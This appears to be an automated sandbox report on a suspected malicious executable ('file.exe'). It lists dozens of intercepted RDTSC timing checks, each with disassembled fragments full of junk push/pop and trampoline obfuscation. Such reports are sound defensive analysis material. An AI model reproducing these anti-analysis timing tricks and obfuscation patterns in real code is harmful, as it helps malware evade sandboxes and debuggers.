                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FF7D second address: 119FF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FF81 second address: 119FF8E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A014E second address: 11A0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A109C second address: 11A10A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A10A2 second address: 11A10A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3094 second address: 11A3098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4190 second address: 11A419A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5E94E4CBA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A612E second address: 11A61A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5E94757C9Fh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e jc 00007F5E94757C96h 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F5E94757C98h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 movzx ebx, si 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F5E94757C98h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 mov ebx, dword ptr [ebp+122D2B49h] 0x00000058 cmc 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A21D7 second address: 11A21E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3295 second address: 11A32B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5215 second address: 11A5223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E94E4CBA6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A61A6 second address: 11A61AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A21E1 second address: 11A21E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A71A9 second address: 11A71B3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6319 second address: 11A631F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A71B3 second address: 11A7233 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E94757CA2h 0x00000008 jmp 00007F5E94757C9Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov bh, B2h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F5E94757C98h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov bx, di 0x00000033 push 00000000h 0x00000035 movsx edi, si 0x00000038 pushad 0x00000039 add dword ptr [ebp+1245E5CCh], esi 0x0000003f push esi 0x00000040 sub dword ptr [ebp+122D369Fh], edx 0x00000046 pop edx 0x00000047 popad 0x00000048 xchg eax, esi 0x00000049 push edi 0x0000004a jmp 00007F5E94757CA3h 0x0000004f pop edi 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 jmp 00007F5E94757CA1h 0x00000059 push edi 0x0000005a pop edi 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A84E0 second address: 11A84ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0A24 second address: 11B0A2E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E94757CADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0A2E second address: 11B0A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnp 00007F5E94E4CBA6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F5E94E4CBB0h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E94E4CBB4h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0A7A second address: 11B0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CF2F second address: 114CF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B02CF second address: 11B02E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E94757CA0h 0x00000008 jmp 00007F5E94757C9Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B02E7 second address: 11B02EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0443 second address: 11B0447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B05B2 second address: 11B05D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jl 00007F5E94E4CBA6h 0x00000010 pop edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B56DE second address: 11B56E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B56E2 second address: 11B571C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jp 00007F5E94E4CBB2h 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E94E4CBB7h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5817 second address: 11B5843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jl 00007F5E94757CA4h 0x0000000f pushad 0x00000010 jc 00007F5E94757C96h 0x00000016 jbe 00007F5E94757C96h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jl 00007F5E94757CA0h 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5843 second address: 11B584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B584F second address: 11B587B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5E94757CA3h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B587B second address: 11B587F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B587F second address: 11B5883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5883 second address: 11B5889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5965 second address: 11B596A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA5D8 second address: 11BA5FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E94E4CBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E94E4CBAFh 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BAD4C second address: 11BAD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94757C96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F5E94757C9Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BAD65 second address: 11BAD84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB8h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C36F1 second address: 11C370E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2343 second address: 11C2347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2347 second address: 11C2353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94757C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2353 second address: 11C236D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBAEh 0x00000007 jng 00007F5E94E4CBAEh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2026 second address: 11C202E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C202E second address: 11C2063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F5E94E4CBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F5E94E4CBD3h 0x00000014 jmp 00007F5E94E4CBB9h 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F5E94E4CBA6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C2F5A second address: 11C2F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3433 second address: 11C3437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7B05 second address: 11C7B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7F2E second address: 11C7F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5E94E4CBC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F5E94E4CBA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7F44 second address: 11C7F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C806D second address: 11C8071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8191 second address: 11C8195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8195 second address: 11C81A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E94E4CBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C81A5 second address: 11C81B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C81B6 second address: 11C81C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F5E94E4CBA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C81C8 second address: 11C81CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C81CC second address: 11C8205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F5E94E4CBB5h 0x0000000f jg 00007F5E94E4CBA8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E94E4CBB0h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8354 second address: 11C835C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C835C second address: 11C8360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C862F second address: 11C8639 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8639 second address: 11C8640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8792 second address: 11C879A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C879A second address: 11C87B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jne 00007F5E94E4CBA8h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8930 second address: 11C894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757CA2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C894B second address: 11C8951 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CC755 second address: 11CC762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F5E94757C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A184 second address: 118A1D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5E94E4CBA8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 xor ch, FFFFFFDAh 0x00000027 lea eax, dword ptr [ebp+1247BF12h] 0x0000002d stc 0x0000002e nop 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F5E94E4CBB6h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A1D4 second address: 118A1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A1D8 second address: 1174771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F5E94E4CBB8h 0x0000000d nop 0x0000000e jmp 00007F5E94E4CBB6h 0x00000013 call dword ptr [ebp+122D207Eh] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A2AB second address: 118A34B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E94757C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E94757C9Dh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebx 0x00000013 xor dword ptr [ebp+122D1A51h], edx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov ecx, ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 movsx edx, di 0x0000002c mov dword ptr [ebp+1247BF6Ah], esp 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F5E94757C98h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c cmp dword ptr [ebp+122D2C21h], 00000000h 0x00000053 jne 00007F5E94757D2Ah 0x00000059 jnp 00007F5E94757CA2h 0x0000005f jl 00007F5E94757C9Ch 0x00000065 mov dword ptr [ebp+122D1BE7h], eax 0x0000006b mov byte ptr [ebp+122D1CD9h], 00000047h 0x00000072 mov dword ptr [ebp+122D1C0Ch], edi 0x00000078 mov cx, 0CA3h 0x0000007c mov eax, D49AA7D2h 0x00000081 jmp 00007F5E94757C9Dh 0x00000086 push eax 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A34B second address: 118A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A34F second address: 118A363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AACD second address: 118AAD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AAD2 second address: 118AAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F5E94757CA0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118ABF6 second address: 118AC19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F5E94E4CBADh 0x0000000e push 00000004h 0x00000010 mov ecx, dword ptr [ebp+122D2919h] 0x00000016 push eax 0x00000017 push ecx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B284 second address: 118B295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B295 second address: 118B299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B299 second address: 118B2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5E94757C98h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B2B1 second address: 118B2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94E4CBB8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B465 second address: 118B46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B46B second address: 118B46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B46F second address: 118B473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCEB8 second address: 11CCEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCEBC second address: 11CCEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD034 second address: 11CD039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD318 second address: 11CD333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E94757C9Dh 0x0000000b jo 00007F5E94757C9Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
